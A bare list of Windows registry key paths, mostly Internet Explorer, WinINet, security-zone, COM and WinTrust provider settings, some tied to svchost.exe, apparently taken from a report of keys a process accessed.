  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\Tracing\Enabled
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\WinHttp\DisableBranchCache
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameTabWindow
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameTabWindow
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameMerging
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\SessionMerging
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AdminTabProcs
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\TabProcGrowth
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\NavigationDelay
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings\Key
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\No3DBorder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\No3DBorder
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextLockCount
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SCHANNEL\UserContextListCount
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\State
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\Safety Warning Level
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionLow
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldDllVersionHigh
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionLow
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\IETldVersionHigh
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/html\Extension
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_SNIFFING\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_FEEDS\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SAFE_BINDTOOBJECT\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollInset
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollDelay
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragScrollInterval
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESTRICT_FILEDOWNLOAD\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\about\CLSID
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2106
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Zoom\ZoomDisabled
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\SmartDithering
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SmartDithering
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseClearType
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Page_Transitions
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Display Inline Videos
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use Stylesheets
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Force Offscreen Composition
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseThemes
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\XDomainRequest
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\Use My Stylesheet
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\MaxScriptStatements
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\x8f\x91\xe9\x80\x81\xe8\x87\xb3 OneNote(&N)\(Default)
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\x8f\x91\xe9\x80\x81\xe8\x87\xb3 OneNote(&N)\Flags
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\x8f\x91\xe9\x80\x81\xe8\x87\xb3 OneNote(&N)\Contexts
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\xaf\xbc\xe5\x87\xba\xe5\x88\xb0 Microsoft Excel(&X)\(Default)
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\xaf\xbc\xe5\x87\xba\xe5\x88\xb0 Microsoft Excel(&X)\Flags
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\\xe5\xaf\xbc\xe5\x87\xba\xe5\x88\xb0 Microsoft Excel(&X)\Contexts
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Version Vector\VML
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Version Vector\IE
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Version Vector\WindowsEdition
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2700
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CoInternetCombineIUriCacheSize
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CoInternetCombineIUriCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CoInternetCombineIUriCacheSize
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CoInternetCombineIUriCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1604
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SUBDOWNLOAD_LOCKDOWN\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecurityIdIUriCacheSize
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecurityIdIUriCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SecurityIdIUriCacheSize
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SecurityIdIUriCacheSize
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SSLUX\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SSLUX\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet
  • HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SECURITYBAND\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SECURITYBAND\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Restrictions\NoNavButtons
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1201
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\AutoRecover
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_IMG\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BLOCK_LMZ_IMG\*
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS\svchost.exe
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS\*
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2000
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default Behaviors\DXTFilterBehavior
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\Compatibility\Bug!\Name
